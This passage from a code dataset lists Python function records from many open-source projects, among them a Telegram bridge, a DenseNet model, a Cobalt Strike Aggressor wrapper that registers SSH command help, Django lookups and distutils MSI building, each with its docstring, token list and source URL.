            log.info( "waits for truth for %7.3fs: %r", delay, predicate )
            time.sleep( delay )
    return True
[ "def", "truth", "(", "self", ",", "predicate", ")", ":", "delay", "=", "0", "found", "=", "None", "while", "found", "!=", "self", ".", "presence", ":", "found", "=", "bool", "(", "predicate", "(", ")", ")", "if", "found", "!=", "self", ".", "presen...
https://github.com/pjkundert/cpppo/blob/4c217b6c06b88bede3888cc5ea2731f271a95086/tools/waits.py#L185-L210
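A stripped-down version of the polling loop, without cpppo's delay capping, idle service, and logging (a hedged sketch, not the library API):

import time

def wait_for(predicate, timeout=5.0, initial=0.01):
    """Poll predicate with doubling delays until it is true or timeout expires."""
    deadline = time.monotonic() + timeout
    delay = initial
    while not predicate():
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            return False
        time.sleep(min(delay, remaining))
        delay *= 2  # exponential backoff
    return True

print(wait_for(lambda: True))  # True on the first check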
mautrix/telegram
9f48eca5a6654bc38012cb761ecaaaf416aabdd0
mautrix_telegram/portal.py
python
Portal.try_handle_telegram_reactions
( self, source: au.AbstractUser, msg_id: TelegramID, data: MessageReactions, dbm: DBMessage | None = None, )
[]
async def try_handle_telegram_reactions(
    self,
    source: au.AbstractUser,
    msg_id: TelegramID,
    data: MessageReactions,
    dbm: DBMessage | None = None,
) -> None:
    try:
        await self.handle_telegram_reactions(source, msg_id, data, dbm)
    except Exception:
        self.log.exception(f"Error handling reactions in message {msg_id}")
[ "async", "def", "try_handle_telegram_reactions", "(", "self", ",", "source", ":", "au", ".", "AbstractUser", ",", "msg_id", ":", "TelegramID", ",", "data", ":", "MessageReactions", ",", "dbm", ":", "DBMessage", "|", "None", "=", "None", ",", ")", "->", "No...
https://github.com/mautrix/telegram/blob/9f48eca5a6654bc38012cb761ecaaaf416aabdd0/mautrix_telegram/portal.py#L2766-L2776
DSE-MSU/DeepRobust
2bcde200a5969dae32cddece66206a52c87c43e8
deeprobust/image/netmodels/densenet.py
python
DenseNet.__init__
(self, block, nblocks, growth_rate=12, reduction=0.5, num_classes=10)
[]
def __init__(self, block, nblocks, growth_rate=12, reduction=0.5, num_classes=10):
    super(DenseNet, self).__init__()
    self.growth_rate = growth_rate

    num_planes = 2*growth_rate
    self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)

    self.dense1 = self._make_dense_layers(block, num_planes, nblocks[0])
    num_planes += nblocks[0]*growth_rate
    out_planes = int(math.floor(num_planes*reduction))
    self.trans1 = Transition(num_planes, out_planes)
    num_planes = out_planes

    self.dense2 = self._make_dense_layers(block, num_planes, nblocks[1])
    num_planes += nblocks[1]*growth_rate
    out_planes = int(math.floor(num_planes*reduction))
    self.trans2 = Transition(num_planes, out_planes)
    num_planes = out_planes

    self.dense3 = self._make_dense_layers(block, num_planes, nblocks[2])
    num_planes += nblocks[2]*growth_rate
    out_planes = int(math.floor(num_planes*reduction))
    self.trans3 = Transition(num_planes, out_planes)
    num_planes = out_planes

    self.dense4 = self._make_dense_layers(block, num_planes, nblocks[3])
    num_planes += nblocks[3]*growth_rate

    self.bn = nn.BatchNorm2d(num_planes)
    self.linear = nn.Linear(num_planes, num_classes)
[ "def", "__init__", "(", "self", ",", "block", ",", "nblocks", ",", "growth_rate", "=", "12", ",", "reduction", "=", "0.5", ",", "num_classes", "=", "10", ")", ":", "super", "(", "DenseNet", ",", "self", ")", ".", "__init__", "(", ")", "self", ".", ...
https://github.com/DSE-MSU/DeepRobust/blob/2bcde200a5969dae32cddece66206a52c87c43e8/deeprobust/image/netmodels/densenet.py#L48-L77
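The channel bookkeeping above can be checked by hand. With the defaults growth_rate=12 and reduction=0.5, and nblocks=[6, 12, 24, 16] (a DenseNet-121-style layout, used here as an assumed example):

import math

growth_rate, reduction = 12, 0.5
nblocks = [6, 12, 24, 16]  # assumed DenseNet-121-style block sizes

num_planes = 2 * growth_rate  # 24 planes out of conv1
for i, n in enumerate(nblocks):
    num_planes += n * growth_rate      # each dense layer adds growth_rate planes
    if i < len(nblocks) - 1:           # transitions follow only the first 3 blocks
        num_planes = int(math.floor(num_planes * reduction))
    print(f"after block {i + 1}: {num_planes} planes")
# -> 48, 96, 192, 384; the final BatchNorm/Linear sees 384 planes.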
KhronosGroup/NNEF-Tools
c913758ca687dab8cb7b49e8f1556819a2d0ca25
nnef_tools/io/tf/lite/flatbuffers/MatrixDiagOptions.py
python
MatrixDiagOptionsEnd
(builder)
return builder.EndObject()
[]
def MatrixDiagOptionsEnd(builder):
    return builder.EndObject()
[ "def", "MatrixDiagOptionsEnd", "(", "builder", ")", ":", "return", "builder", ".", "EndObject", "(", ")" ]
https://github.com/KhronosGroup/NNEF-Tools/blob/c913758ca687dab8cb7b49e8f1556819a2d0ca25/nnef_tools/io/tf/lite/flatbuffers/MatrixDiagOptions.py#L28-L28
dcsync/pycobalt
d3a630bfadaeeb6c99aad28f226abe48f6b4acca
pycobalt/aggressor.py
python
ssh_command_register
(*args, fork=None, sync=True)
return engine.call('ssh_command_register', args, fork=fork, sync=sync)
r""" Documentation from https://www.cobaltstrike.com/aggressor-script/functions.html: Register help information for an SSH console command. Arguments $1 - the command $2 - the short description of the command $3 - the long-form help for the command. Example ssh_alis echo { blog($1, "You typed: " . substr($1, 5)); } ssh_command_register( "echo", "echo posts to the current session's log", "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
r""" Documentation from https://www.cobaltstrike.com/aggressor-script/functions.html:
[ "r", "Documentation", "from", "https", ":", "//", "www", ".", "cobaltstrike", ".", "com", "/", "aggressor", "-", "script", "/", "functions", ".", "html", ":" ]
def ssh_command_register(*args, fork=None, sync=True):
    r"""
    Documentation from https://www.cobaltstrike.com/aggressor-script/functions.html:

    Register help information for an SSH console command.

    Arguments

    $1 - the command
    $2 - the short description of the command
    $3 - the long-form help for the command.

    Example

    ssh_alis echo {
        blog($1, "You typed: " . substr($1, 5));
    }

    ssh_command_register(
        "echo",
        "echo posts to the current session's log",
        "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
    """
    return engine.call('ssh_command_register', args, fork=fork, sync=sync)
[ "def", "ssh_command_register", "(", "*", "args", ",", "fork", "=", "None", ",", "sync", "=", "True", ")", ":", "return", "engine", ".", "call", "(", "'ssh_command_register'", ",", "args", ",", "fork", "=", "fork", ",", "sync", "=", "sync", ")" ]
https://github.com/dcsync/pycobalt/blob/d3a630bfadaeeb6c99aad28f226abe48f6b4acca/pycobalt/aggressor.py#L6471-L6492
ricequant/rqalpha
d8b345ca3fde299e061c6a89c1f2c362c3584c96
rqalpha/core/strategy_context.py
python
RunInfo.slippage
(self)
return self._slippage
滑点水平
滑点水平
[ "滑点水平" ]
def slippage(self):
    # type: () -> float
    """
    滑点水平 (slippage level)
    """
    return self._slippage
[ "def", "slippage", "(", "self", ")", ":", "# type: () -> float", "return", "self", ".", "_slippage" ]
https://github.com/ricequant/rqalpha/blob/d8b345ca3fde299e061c6a89c1f2c362c3584c96/rqalpha/core/strategy_context.py#L92-L97
FSecureLABS/Jandroid
e31d0dab58a2bfd6ed8e0a387172b8bd7c893436
libs/platform-tools/platform-tools_windows/systrace/catapult/systrace/systrace/tracing_agents/atrace_agent.py
python
AtraceAgent._collect_trace_data
(self)
return output
Reads the output from atrace and stops the trace.
Reads the output from atrace and stops the trace.
[ "Reads", "the", "output", "from", "atrace", "and", "stops", "the", "trace", "." ]
def _collect_trace_data(self):
    """Reads the output from atrace and stops the trace."""
    result = self._stop_collect_trace()

    data_start = re.search(TRACE_START_REGEXP, result)
    if data_start:
        data_start = data_start.end(0)
    else:
        raise IOError('Unable to get atrace data. Did you forget adb root?')
    output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
    return output
[ "def", "_collect_trace_data", "(", "self", ")", ":", "result", "=", "self", ".", "_stop_collect_trace", "(", ")", "data_start", "=", "re", ".", "search", "(", "TRACE_START_REGEXP", ",", "result", ")", "if", "data_start", ":", "data_start", "=", "data_start", ...
https://github.com/FSecureLABS/Jandroid/blob/e31d0dab58a2bfd6ed8e0a387172b8bd7c893436/libs/platform-tools/platform-tools_windows/systrace/catapult/systrace/systrace/tracing_agents/atrace_agent.py#L260-L270
google-research/recsim
55e50e4be736d222ffe8c2477ed1981b40f91605
recsim/simulator/environment.py
python
MultiUserEnvironment.reset
(self)
return (user_obs, self._current_documents)
Resets the environment and return the first observation. Returns: user_obs: An array of floats representing observations of the user's current state doc_obs: An OrderedDict of document observations keyed by document ids
Resets the environment and return the first observation.
[ "Resets", "the", "environment", "and", "return", "the", "first", "observation", "." ]
def reset(self):
    """Resets the environment and return the first observation.

    Returns:
        user_obs: An array of floats representing observations of the user's
            current state
        doc_obs: An OrderedDict of document observations keyed by document ids
    """
    for user_model in self.user_model:
        user_model.reset()
    user_obs = [
        user_model.create_observation() for user_model in self.user_model
    ]
    if self._resample_documents:
        self._do_resample_documents()
    self._current_documents = collections.OrderedDict(
        self._candidate_set.create_observation())
    return (user_obs, self._current_documents)
[ "def", "reset", "(", "self", ")", ":", "for", "user_model", "in", "self", ".", "user_model", ":", "user_model", ".", "reset", "(", ")", "user_obs", "=", "[", "user_model", ".", "create_observation", "(", ")", "for", "user_model", "in", "self", ".", "user...
https://github.com/google-research/recsim/blob/55e50e4be736d222ffe8c2477ed1981b40f91605/recsim/simulator/environment.py#L238-L255
dimagi/commcare-hq
d67ff1d3b4c51fa050c19e60c3253a79d3452a39
corehq/apps/app_manager/models.py
python
LazyBlobDoc.save
(self, **params)
[]
def save(self, **params):
    def super_save():
        super(LazyBlobDoc, self).save(**params)

    if self._LAZY_ATTACHMENTS:
        with self.atomic_blobs(super_save):
            for name, info in self._LAZY_ATTACHMENTS.items():
                if not info['content_type']:
                    info['content_type'] = ';'.join(filter(None, guess_type(name)))
                super(LazyBlobDoc, self).put_attachment(name=name, **info)
        # super_save() has succeeded by now
        for name, info in self._LAZY_ATTACHMENTS.items():
            self.__set_cached_attachment(name, info['content'])
        self._LAZY_ATTACHMENTS.clear()
    else:
        super_save()
[ "def", "save", "(", "self", ",", "*", "*", "params", ")", ":", "def", "super_save", "(", ")", ":", "super", "(", "LazyBlobDoc", ",", "self", ")", ".", "save", "(", "*", "*", "params", ")", "if", "self", ".", "_LAZY_ATTACHMENTS", ":", "with", "self"...
https://github.com/dimagi/commcare-hq/blob/d67ff1d3b4c51fa050c19e60c3253a79d3452a39/corehq/apps/app_manager/models.py#L3971-L3985
kuri65536/python-for-android
26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891
python-modules/twisted/twisted/mail/imap4.py
python
MessageProducer.__init__
(self, msg, buffer = None, scheduler = None)
Produce this message. @param msg: The message I am to produce. @type msg: L{IMessage} @param buffer: A buffer to hold the message in. If None, I will use a L{tempfile.TemporaryFile}. @type buffer: file-like
Produce this message.
[ "Produce", "this", "message", "." ]
def __init__(self, msg, buffer = None, scheduler = None):
    """Produce this message.

    @param msg: The message I am to produce.
    @type msg: L{IMessage}

    @param buffer: A buffer to hold the message in.  If None, I will
        use a L{tempfile.TemporaryFile}.
    @type buffer: file-like
    """
    self.msg = msg
    if buffer is None:
        buffer = tempfile.TemporaryFile()
    self.buffer = buffer
    if scheduler is None:
        scheduler = iterateInReactor
    self.scheduler = scheduler
    self.write = self.buffer.write
[ "def", "__init__", "(", "self", ",", "msg", ",", "buffer", "=", "None", ",", "scheduler", "=", "None", ")", ":", "self", ".", "msg", "=", "msg", "if", "buffer", "is", "None", ":", "buffer", "=", "tempfile", ".", "TemporaryFile", "(", ")", "self", "...
https://github.com/kuri65536/python-for-android/blob/26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891/python-modules/twisted/twisted/mail/imap4.py#L5278-L5295
bendmorris/static-python
2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473
Lib/_pyio.py
python
BufferedReader.__init__
(self, raw, buffer_size=DEFAULT_BUFFER_SIZE)
Create a new buffered reader using the given readable raw IO object.
Create a new buffered reader using the given readable raw IO object.
[ "Create", "a", "new", "buffered", "reader", "using", "the", "given", "readable", "raw", "IO", "object", "." ]
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
    """Create a new buffered reader using the given readable raw IO object.
    """
    if not raw.readable():
        raise OSError('"raw" argument must be readable.')

    _BufferedIOMixin.__init__(self, raw)
    if buffer_size <= 0:
        raise ValueError("invalid buffer size")
    self.buffer_size = buffer_size
    self._reset_read_buf()
    self._read_lock = Lock()
[ "def", "__init__", "(", "self", ",", "raw", ",", "buffer_size", "=", "DEFAULT_BUFFER_SIZE", ")", ":", "if", "not", "raw", ".", "readable", "(", ")", ":", "raise", "OSError", "(", "'\"raw\" argument must be readable.'", ")", "_BufferedIOMixin", ".", "__init__", ...
https://github.com/bendmorris/static-python/blob/2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473/Lib/_pyio.py#L928-L939
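_pyio.BufferedReader is the pure-Python twin of the C-accelerated io.BufferedReader; the same contract can be exercised through the stdlib:

import io

raw = io.BytesIO(b"hello world")                 # any readable stream works
reader = io.BufferedReader(raw, buffer_size=8192)
print(reader.read(5))                             # b'hello'
print(reader.peek(3)[:3])                         # b' wo', without consuming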
JaniceWuo/MovieRecommend
4c86db64ca45598917d304f535413df3bc9fea65
movierecommend/venv1/Lib/site-packages/django/db/models/lookups.py
python
YearComparisonLookup.get_rhs_op
(self, connection, rhs)
return connection.operators[self.lookup_name] % rhs
[]
def get_rhs_op(self, connection, rhs):
    return connection.operators[self.lookup_name] % rhs
[ "def", "get_rhs_op", "(", "self", ",", "connection", ",", "rhs", ")", ":", "return", "connection", ".", "operators", "[", "self", ".", "lookup_name", "]", "%", "rhs" ]
https://github.com/JaniceWuo/MovieRecommend/blob/4c86db64ca45598917d304f535413df3bc9fea65/movierecommend/venv1/Lib/site-packages/django/db/models/lookups.py#L569-L570
peeringdb/peeringdb
47c6a699267b35663898f8d261159bdae9720f04
peeringdb_server/models.py
python
IXFMemberData.netixlan
(self)
return self._netixlan
Will either return a matching existing netixlan instance (asn,ip4,ip6) or a new netixlan if a matching netixlan does not currently exist. Any new netixlan will NOT be saved at this point. Note that the netixlan that matched may be currently soft-deleted (status=="deleted").
Will either return a matching existing netixlan instance (asn,ip4,ip6) or a new netixlan if a matching netixlan does not currently exist.
[ "Will", "either", "return", "a", "matching", "existing", "netixlan", "instance", "(", "asn", "ip4", "ip6", ")", "or", "a", "new", "netixlan", "if", "a", "matching", "netixlan", "does", "not", "currently", "exist", "." ]
def netixlan(self): """ Will either return a matching existing netixlan instance (asn,ip4,ip6) or a new netixlan if a matching netixlan does not currently exist. Any new netixlan will NOT be saved at this point. Note that the netixlan that matched may be currently soft-deleted (status=="deleted"). """ if not hasattr(self, "_netixlan"): if not hasattr(self, "for_deletion"): self.for_deletion = self.remote_data_missing try: if self.for_deletion: filters = self.id_filters( self.asn, self.ipaddr4, self.ipaddr6, check_protocols=False ) else: filters = self.id_filters(self.asn, self.ipaddr4, self.ipaddr6) if "ipaddr6" not in filters and "ipaddr4" not in filters: raise NetworkIXLan.DoesNotExist() self._netixlan = NetworkIXLan.objects.get(**filters) except NetworkIXLan.DoesNotExist: is_rs_peer = self.is_rs_peer if is_rs_peer is None: is_rs_peer = False self._netixlan = NetworkIXLan( ipaddr4=self.ipaddr4, ipaddr6=self.ipaddr6, speed=self.speed, asn=self.asn, operational=self.operational, is_rs_peer=is_rs_peer, ixlan=self.ixlan, network=self.net, status="ok", ) return self._netixlan
[ "def", "netixlan", "(", "self", ")", ":", "if", "not", "hasattr", "(", "self", ",", "\"_netixlan\"", ")", ":", "if", "not", "hasattr", "(", "self", ",", "\"for_deletion\"", ")", ":", "self", ".", "for_deletion", "=", "self", ".", "remote_data_missing", "...
https://github.com/peeringdb/peeringdb/blob/47c6a699267b35663898f8d261159bdae9720f04/peeringdb_server/models.py#L3522-L3570
scientifichackers/ampy
dd4ca50b57c3bd24decc8ca8059be8d9ee48a1a0
ampy/cli.py
python
rm
(remote_file)
Remove a file from the board. Remove the specified file from the board's filesystem. Must specify one argument which is the path to the file to delete. Note that this can't delete directories which have files inside them, but can delete empty directories. For example to delete main.py from the root of a board run: ampy --port /board/serial/port rm main.py
Remove a file from the board.
[ "Remove", "a", "file", "from", "the", "board", "." ]
def rm(remote_file):
    """Remove a file from the board.

    Remove the specified file from the board's filesystem.  Must specify one
    argument which is the path to the file to delete.

    Note that this can't delete directories which have files inside them, but
    can delete empty directories.

    For example to delete main.py from the root of a board run:

      ampy --port /board/serial/port rm main.py
    """
    # Delete the provided file/directory on the board.
    board_files = files.Files(_board)
    board_files.rm(remote_file)
[ "def", "rm", "(", "remote_file", ")", ":", "# Delete the provided file/directory on the board.", "board_files", "=", "files", ".", "Files", "(", "_board", ")", "board_files", ".", "rm", "(", "remote_file", ")" ]
https://github.com/scientifichackers/ampy/blob/dd4ca50b57c3bd24decc8ca8059be8d9ee48a1a0/ampy/cli.py#L284-L298
SJ001/AI-Feynman
a05bc4a5be23d6eb3e1d0b2f7eb1ab5b78a920ad
aifeynman/get_pareto.py
python
ParetoSet.plot
(self)
Plotting the Pareto frontier.
Plotting the Pareto frontier.
[ "Plotting", "the", "Pareto", "frontier", "." ]
def plot(self):
    """Plotting the Pareto frontier."""
    array = self.to_array()
    plt.figure(figsize=(8, 6))
    plt.plot(array[:, 0], array[:, 1], 'r.')
    plt.show()
[ "def", "plot", "(", "self", ")", ":", "array", "=", "self", ".", "to_array", "(", ")", "plt", ".", "figure", "(", "figsize", "=", "(", "8", ",", "6", ")", ")", "plt", ".", "plot", "(", "array", "[", ":", ",", "0", "]", ",", "array", "[", ":...
https://github.com/SJ001/AI-Feynman/blob/a05bc4a5be23d6eb3e1d0b2f7eb1ab5b78a920ad/aifeynman/get_pareto.py#L246-L251
linxid/Machine_Learning_Study_Path
558e82d13237114bbb8152483977806fc0c222af
Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/index.py
python
InstallationCandidate.__eq__
(self, other)
return self._compare(other, lambda s, o: s == o)
[]
def __eq__(self, other):
    return self._compare(other, lambda s, o: s == o)
[ "def", "__eq__", "(", "self", ",", "other", ")", ":", "return", "self", ".", "_compare", "(", "other", ",", "lambda", "s", ",", "o", ":", "s", "==", "o", ")" ]
https://github.com/linxid/Machine_Learning_Study_Path/blob/558e82d13237114bbb8152483977806fc0c222af/Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/index.py#L82-L83
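The method delegates to a `_compare` helper that keys all rich comparisons off a single tuple; a minimal sketch of that pattern (hypothetical class, not pip's exact code):

class Candidate:
    def __init__(self, project, version):
        self._key = (project, version)

    def _compare(self, other, method):
        if not isinstance(other, Candidate):
            return NotImplemented
        return method(self._key, other._key)

    def __eq__(self, other):
        return self._compare(other, lambda s, o: s == o)

    def __lt__(self, other):
        return self._compare(other, lambda s, o: s < o)

print(Candidate("pip", "9.0.1") == Candidate("pip", "9.0.1"))  # True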
Luodian/MADAN
7a2918da44f5203b72652bc4cba0e70057482114
cyclegan/data/base_data_loader.py
python
BaseDataLoader.initialize
(self, opt)
[]
def initialize(self, opt):
    self.opt = opt
    pass
[ "def", "initialize", "(", "self", ",", "opt", ")", ":", "self", ".", "opt", "=", "opt", "pass" ]
https://github.com/Luodian/MADAN/blob/7a2918da44f5203b72652bc4cba0e70057482114/cyclegan/data/base_data_loader.py#L5-L7
jgagneastro/coffeegrindsize
22661ebd21831dba4cf32bfc6ba59fe3d49f879c
App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/matplotlib/backends/_backend_tk.py
python
raise_msg_to_str
(msg)
return msg
msg is a return arg from a raise. Join with new lines
msg is a return arg from a raise. Join with new lines
[ "msg", "is", "a", "return", "arg", "from", "a", "raise", ".", "Join", "with", "new", "lines" ]
def raise_msg_to_str(msg):
    """msg is a return arg from a raise.  Join with new lines"""
    if not isinstance(msg, str):
        msg = '\n'.join(map(str, msg))
    return msg
[ "def", "raise_msg_to_str", "(", "msg", ")", ":", "if", "not", "isinstance", "(", "msg", ",", "str", ")", ":", "msg", "=", "'\\n'", ".", "join", "(", "map", "(", "str", ",", "msg", ")", ")", "return", "msg" ]
https://github.com/jgagneastro/coffeegrindsize/blob/22661ebd21831dba4cf32bfc6ba59fe3d49f879c/App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/matplotlib/backends/_backend_tk.py#L57-L61
SteveDoyle2/pyNastran
eda651ac2d4883d95a34951f8a002ff94f642a1a
pyNastran/gui/utils/qt/qelement_edit.py
python
QNodeElementEdit.on_focus_callback
(self, eids, nids, name)
the callback method for ``on_focus``
the callback method for ``on_focus``
[ "the", "callback", "method", "for", "on_focus" ]
def on_focus_callback(self, eids, nids, name):
    """the callback method for ``on_focus``"""
    raise NotImplementedError('write_patran_syntax_dict callback')
[ "def", "on_focus_callback", "(", "self", ",", "eids", ",", "nids", ",", "name", ")", ":", "raise", "NotImplementedError", "(", "'write_patran_syntax_dict callback'", ")" ]
https://github.com/SteveDoyle2/pyNastran/blob/eda651ac2d4883d95a34951f8a002ff94f642a1a/pyNastran/gui/utils/qt/qelement_edit.py#L64-L66
google/pytype
fa43edc95dd42ade6e3147d6580d63e778c9d506
pytype/state.py
python
split_conditions
(node, var)
return (_restrict_condition(node, var.bindings, True), _restrict_condition(node, var.bindings, False))
Return a pair of conditions for the value being true and false.
Return a pair of conditions for the value being true and false.
[ "Return", "a", "pair", "of", "conditions", "for", "the", "value", "being", "true", "and", "false", "." ]
def split_conditions(node, var):
    """Return a pair of conditions for the value being true and false."""
    return (_restrict_condition(node, var.bindings, True),
            _restrict_condition(node, var.bindings, False))
[ "def", "split_conditions", "(", "node", ",", "var", ")", ":", "return", "(", "_restrict_condition", "(", "node", ",", "var", ".", "bindings", ",", "True", ")", ",", "_restrict_condition", "(", "node", ",", "var", ".", "bindings", ",", "False", ")", ")" ]
https://github.com/google/pytype/blob/fa43edc95dd42ade6e3147d6580d63e778c9d506/pytype/state.py#L331-L334
IJDykeman/wangTiles
7c1ee2095ebdf7f72bce07d94c6484915d5cae8b
experimental_code/tiles_3d/venv_mac/lib/python2.7/site-packages/pip/utils/__init__.py
python
captured_stdout
()
return captured_output('stdout')
Capture the output of sys.stdout: with captured_stdout() as stdout: print('hello') self.assertEqual(stdout.getvalue(), 'hello\n') Taken from Lib/support/__init__.py in the CPython repo.
Capture the output of sys.stdout:
[ "Capture", "the", "output", "of", "sys", ".", "stdout", ":" ]
def captured_stdout():
    """Capture the output of sys.stdout:

       with captured_stdout() as stdout:
           print('hello')
       self.assertEqual(stdout.getvalue(), 'hello\n')

    Taken from Lib/support/__init__.py in the CPython repo.
    """
    return captured_output('stdout')
[ "def", "captured_stdout", "(", ")", ":", "return", "captured_output", "(", "'stdout'", ")" ]
https://github.com/IJDykeman/wangTiles/blob/7c1ee2095ebdf7f72bce07d94c6484915d5cae8b/experimental_code/tiles_3d/venv_mac/lib/python2.7/site-packages/pip/utils/__init__.py#L798-L807
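Since Python 3.4 the standard library offers the same capture directly, which is the usual replacement for this helper:

import contextlib
import io

buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    print('hello')
assert buf.getvalue() == 'hello\n'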
armijnhemel/binaryanalysis-ng
34c655ed71d3d022ee49c4e1271002b2ebf40001
src/parsers/media/au/UnpackParser.py
python
AuUnpackParser.set_metadata_and_labels
(self)
sets metadata and labels for the unpackresults
sets metadata and labels for the unpackresults
[ "sets", "metadata", "and", "labels", "for", "the", "unpackresults" ]
def set_metadata_and_labels(self):
    """sets metadata and labels for the unpackresults"""
    labels = [ 'au', 'audio' ]
    metadata = {}
    if self.data.header.comment != '':
        metadata['comment'] = self.data.header.comment

    self.unpack_results.set_metadata(metadata)
    self.unpack_results.set_labels(labels)
[ "def", "set_metadata_and_labels", "(", "self", ")", ":", "labels", "=", "[", "'au'", ",", "'audio'", "]", "metadata", "=", "{", "}", "if", "self", ".", "data", ".", "header", ".", "comment", "!=", "''", ":", "metadata", "[", "'comment'", "]", "=", "s...
https://github.com/armijnhemel/binaryanalysis-ng/blob/34c655ed71d3d022ee49c4e1271002b2ebf40001/src/parsers/media/au/UnpackParser.py#L63-L71
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/point/__init__.py
python
MinutPointClient.is_available
(self, device_id)
return device_id in self._client.device_ids
Return device availability.
Return device availability.
[ "Return", "device", "availability", "." ]
def is_available(self, device_id):
    """Return device availability."""
    if not self._is_available:
        return False
    return device_id in self._client.device_ids
[ "def", "is_available", "(", "self", ",", "device_id", ")", ":", "if", "not", "self", ".", "_is_available", ":", "return", "False", "return", "device_id", "in", "self", ".", "_client", ".", "device_ids" ]
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/point/__init__.py#L228-L232
pytorch/fairseq
1575f30dd0a9f7b3c499db0b4767aa4e9f79056c
fairseq/data/audio/data_cfg.py
python
S2TDataConfig.speaker_set_filename
(self)
return self.config.get("speaker_set_filename", None)
speaker set file under data root
speaker set file under data root
[ "speaker", "set", "file", "under", "data", "root" ]
def speaker_set_filename(self):
    """speaker set file under data root"""
    return self.config.get("speaker_set_filename", None)
[ "def", "speaker_set_filename", "(", "self", ")", ":", "return", "self", ".", "config", ".", "get", "(", "\"speaker_set_filename\"", ",", "None", ")" ]
https://github.com/pytorch/fairseq/blob/1575f30dd0a9f7b3c499db0b4767aa4e9f79056c/fairseq/data/audio/data_cfg.py#L51-L53
nobody132/masr
cf324178982d5a96cfd6a8384b8dfd077d9eab50
decoder.py
python
Decoder.decode
(self, probs, sizes=None)
Given a matrix of character probabilities, returns the decoder's best guess of the transcription Arguments: probs: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t sizes(optional): Size of each sequence in the mini-batch Returns: string: sequence of the model's best guess for the transcription
Given a matrix of character probabilities, returns the decoder's best guess of the transcription
[ "Given", "a", "matrix", "of", "character", "probabilities", "returns", "the", "decoder", "s", "best", "guess", "of", "the", "transcription" ]
def decode(self, probs, sizes=None):
    """
    Given a matrix of character probabilities, returns the decoder's
    best guess of the transcription

    Arguments:
        probs: Tensor of character probabilities, where probs[c,t]
            is the probability of character c at time t
        sizes(optional): Size of each sequence in the mini-batch
    Returns:
        string: sequence of the model's best guess for the transcription
    """
    raise NotImplementedError
[ "def", "decode", "(", "self", ",", "probs", ",", "sizes", "=", "None", ")", ":", "raise", "NotImplementedError" ]
https://github.com/nobody132/masr/blob/cf324178982d5a96cfd6a8384b8dfd077d9eab50/decoder.py#L60-L72
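A concrete subclass supplies decode(); as an assumed illustration of the contract, a naive greedy (argmax) CTC-style decoder over a made-up label set:

import numpy as np

LABELS = "_ab"  # hypothetical labels; index 0 plays the CTC blank

def greedy_decode(probs):
    """probs[c, t] is the probability of character c at time t."""
    best = probs.argmax(axis=0)        # most likely class per timestep
    out, prev = [], 0
    for c in best:
        if c != prev and c != 0:       # collapse repeats, drop blanks
            out.append(LABELS[c])
        prev = c
    return "".join(out)

probs = np.array([[0.1, 0.8, 0.1],    # 3 classes x 3 timesteps
                  [0.7, 0.1, 0.1],
                  [0.2, 0.1, 0.8]])
print(greedy_decode(probs))            # -> "ab"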
kuri65536/python-for-android
26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891
python-modules/twisted/twisted/persisted/journal/base.py
python
Journal._reallyExecute
(self, index, command, runTime)
return result
Callback called when logging command is done.
Callback called when logging command is done.
[ "Callback", "called", "when", "logging", "command", "is", "done", "." ]
def _reallyExecute(self, index, command, runTime):
    """Callback called when logging command is done."""
    result = command.execute(self.journaledService, runTime)
    self.latestIndex = index
    return result
[ "def", "_reallyExecute", "(", "self", ",", "index", ",", "command", ",", "runTime", ")", ":", "result", "=", "command", ".", "execute", "(", "self", ".", "journaledService", ",", "runTime", ")", "self", ".", "latestIndex", "=", "index", "return", "result" ...
https://github.com/kuri65536/python-for-android/blob/26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891/python-modules/twisted/twisted/persisted/journal/base.py#L54-L58
jython/jython3
def4f8ec47cb7a9c799ea4c745f12badf92c5769
lib-python/3.5.1/distutils/command/bdist_msi.py
python
bdist_msi.add_find_python
(self)
Adds code to the installer to compute the location of Python. Properties PYTHON.MACHINE.X.Y and PYTHON.USER.X.Y will be set from the registry for each version of Python. Properties TARGETDIRX.Y will be set from PYTHON.USER.X.Y if defined, else from PYTHON.MACHINE.X.Y. Properties PYTHONX.Y will be set to TARGETDIRX.Y\\python.exe
Adds code to the installer to compute the location of Python.
[ "Adds", "code", "to", "the", "installer", "to", "compute", "the", "location", "of", "Python", "." ]
def add_find_python(self):
    """Adds code to the installer to compute the location of Python.

    Properties PYTHON.MACHINE.X.Y and PYTHON.USER.X.Y will be set from the
    registry for each version of Python.

    Properties TARGETDIRX.Y will be set from PYTHON.USER.X.Y if defined,
    else from PYTHON.MACHINE.X.Y.

    Properties PYTHONX.Y will be set to TARGETDIRX.Y\\python.exe"""

    start = 402
    for ver in self.versions:
        install_path = r"SOFTWARE\Python\PythonCore\%s\InstallPath" % ver
        machine_reg = "python.machine." + ver
        user_reg = "python.user." + ver
        machine_prop = "PYTHON.MACHINE." + ver
        user_prop = "PYTHON.USER." + ver
        machine_action = "PythonFromMachine" + ver
        user_action = "PythonFromUser" + ver
        exe_action = "PythonExe" + ver
        target_dir_prop = "TARGETDIR" + ver
        exe_prop = "PYTHON" + ver
        if msilib.Win64:
            # type: msidbLocatorTypeRawValue + msidbLocatorType64bit
            Type = 2+16
        else:
            Type = 2
        add_data(self.db, "RegLocator",
                 [(machine_reg, 2, install_path, None, Type),
                  (user_reg, 1, install_path, None, Type)])
        add_data(self.db, "AppSearch",
                 [(machine_prop, machine_reg),
                  (user_prop, user_reg)])
